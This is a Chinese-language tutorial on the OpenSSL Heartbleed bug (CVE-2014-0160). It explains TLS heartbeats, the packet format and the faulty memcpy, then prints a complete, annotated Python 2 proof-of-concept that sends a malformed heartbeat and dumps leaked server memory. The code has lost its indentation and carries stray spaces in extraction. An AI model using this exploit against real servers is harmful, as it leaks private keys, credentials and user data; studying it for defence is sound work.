概述
心脏出血漏洞是 OpenSSL 在实现 SSL/TLS 的心跳扩展时,由于代码缺陷导致的缓冲区过读漏洞。
OpenSSL 的心跳处理逻辑中,没有检验心跳请求包的长度字段和后续的数据字段是否相符合。
因此,攻击者可以通过构造请求包,获取服务器内存中的敏感信息(最多 64KB)。
要了解漏洞的原理,我们要弄清楚以下几个问题:
SSL/TLS 是什么?
心跳扩展是怎么工作的?
OpenSSL 是怎么处理 TLS 心跳扩展的?
怎么利用漏洞?
SSL/TLS 简介
SSL 和 TLS 都是用来加密传输数据的协议,而 TLS 是在 SSL3.0 基础上开发的新版本(可
以看作 SSL4.0)。两者使用的证书跟协议本身无关,而是取决于服务器的配置,一般服务
器都会使用“SSL/TLS 证书”兼容两种协议。
The differences between this protocol and SSL 3.0 are not dramatic, but they are
significant enough that TLS 1.0 and SSL 3.0 do not interoperate. (Reference )
SSL/TLS 的工作过程:
客户端向服务器端索要公钥,并验证
双方协商生成“对话密钥”
双方采用“对话密钥”进行加密通信
简单来说,就是一个 用非对称加密来确定对称加密的密钥,再用该密钥进行加密传输 的过
程。前者也称为“握手阶段”(handshake)。
Heartbeat 扩展协议
在没有心跳扩展前,SSL/TLS 的双方不能一直保持连接,只要客户端在一段时间没有请求,
服务器就会中断连接并释放资源。当同一个客户端继续进行上次的连接,必须要与服务器重
新协商、建立连接,而重新协商连接消耗很大。心跳扩展则可以解决这个问题。
(Reference )
在使用心跳扩展时,如果客户端一段时间内没有进行操作,就会自动发送一个心跳请求包。
客户端通过请求包发送一个固定长度的字符串,并事先告诉服务端这个字符串有多长。服务
端知道“长度”后,先在内存预留一个相应大小的缓冲区,再将字符串放到缓冲区中,最后
从内存读取这个字符串并通过心跳响应包返回给客户端。这样一来一回,服务端就知道这个
客户端还是“活的”,连接也就可以保持了。
心跳包字段 长度 说明 ContentType 1byte 心跳包类型,IANA 组织把 type 编号定义为 24(0x18) ProtocolVersion 2bytes TLS 的版本号,目前主要包括含有心跳扩展的 TLS 版本:TLSv1.0,TLSv1.1,TLSv1.2 length 2bytes HeartbeatMessage 的长度 HeartbeatMessageType 1byte Heartbeat 类型,01 表示 heartbeat_request,02 表示 heartbeat_response payload_length 2bytes payload 长度 payload payload_length*bytes payload 的具体内容 padding >=16bytes padding 填充,最少为 16 个字节
TLS 心跳包格式
漏洞成因
OpenSSL 收到心跳请求包后,并没有检查真正收到数据是不是像它所说的一样长。假如,请
求包说“我给你的是一个 30KB 的字符串”,但实际上这个字符串只有 10KB。OpenSSL 依然会
从内存中额外复制 20KB 的数据,并通过响应包返回给客户端。
心跳包最多可以发送 64KB 的数据,所以攻击者可以利用这个漏洞,获得服务器内存中的 64KB 数据。
导致该漏洞的一行代码
memcpy(bp, pl, payload);
memcpy()
的作用是复制数据, bp
是要复制到的地方, pl
是数据源, payload
是数据的
长度。这个函数的问题在于,没有检查 pl
中的数据的长度是不是和 payload
相等。
POC
#!/usr/bin/python
#-*- coding: utf-8 -*-
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser ( usage = '%prog server [options]' ,
description = 'Test for SSL heartbeat vulnerability (CVE-2014-0160)' )
options . add_option ( '-p' , '--port' , type = 'int' , default = 443 , help = 'TCP port to test (default: 443)' )
def h2bin ( x ):
return x . replace ( ' ' , '' ). replace ( ' \n ' , '' ). decode ( 'hex' )
# ClientHello,提供协议版本、随机数、支持的加密和压缩算法等信息
hello = h2bin ( '''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''' )
# 心跳请求包,最后两个字节是长度,即16384(0x4000)
hb = h2bin ( '''
18 03 02 00 03
01 40 00
''' )
# 解析内存的数据
def hexdump ( s ):
for b in xrange ( 0 , len ( s ), 16 ):
lin = [ c for c in s [ b : b + 16 ]]
hxdat = ' ' . join ( ' %02X ' % ord ( c ) for c in lin )
pdat = '' . join (( c if 32 <= ord ( c ) <= 126 else '.' ) for c in lin )
print ' %04x : %-48s %s ' % ( b , hxdat , pdat )
print
def recvall ( s , length , timeout = 5 ):
endtime = time . time () + timeout
rdata = ''
remain = length
while remain > 0 :
rtime = endtime - time . time () # 剩余时间
if rtime < 0 :
return None
r , w , e = select . select ([ s ], [], [], 5 )
if s in r :
data = s . recv ( remain )
# EOF?
if not data :
return None
rdata += data
remain -= len ( data )
return rdata
def recvmsg ( s ):
hdr = recvall ( s , 5 )
if hdr is None :
print 'Unexpected EOF receiving record header - server closed connection'
return None , None , None
typ , ver , ln = struct . unpack ( '>BHH' , hdr )
pay = recvall ( s , ln , 10 )
if pay is None :
print 'Unexpected EOF receiving record payload - server closed connection'
return None , None , None
print ' ... received message: type = %d , ver = %04x , length = %d ' % ( typ , ver , len ( pay ))
return typ , ver , pay
def hit_hb ( s ):
s . send ( hb )
while True :
typ , ver , pay = recvmsg ( s )
if typ is None :
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24 :
print 'Received heartbeat response:'
hexdump ( pay )
if len ( pay ) > 3 :
print 'WARNING: server returned more data than it should - server is vulnerable!'
else :
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21 :
print 'Received alert:'
hexdump ( pay )
print 'Server returned error, likely not vulnerable'
return False
def main ():
opts , args = options . parse_args () # 解析参数(IP和端口)
if len ( args ) < 1 :
options . print_help ()
return
s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
print 'Connecting...'
sys . stdout . flush () # 刷新输出
s . connect (( args [ 0 ], opts . port ))
print 'Sending Client Hello...'
sys . stdout . flush ()
s . send ( hello ) # 发送ClientHello请求
print 'Waiting for Server Hello...'
sys . stdout . flush ()
while True :
typ , ver , pay = recvmsg ( s )
if typ == None :
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord ( pay [ 0 ]) == 0x 0E :
break
print 'Sending heartbeat request...'
sys . stdout . flush ()
s . send ( hb ) # 发送心跳包
hit_hb ( s ) # 检测心血漏洞
if __name__ == '__main__' :
main ()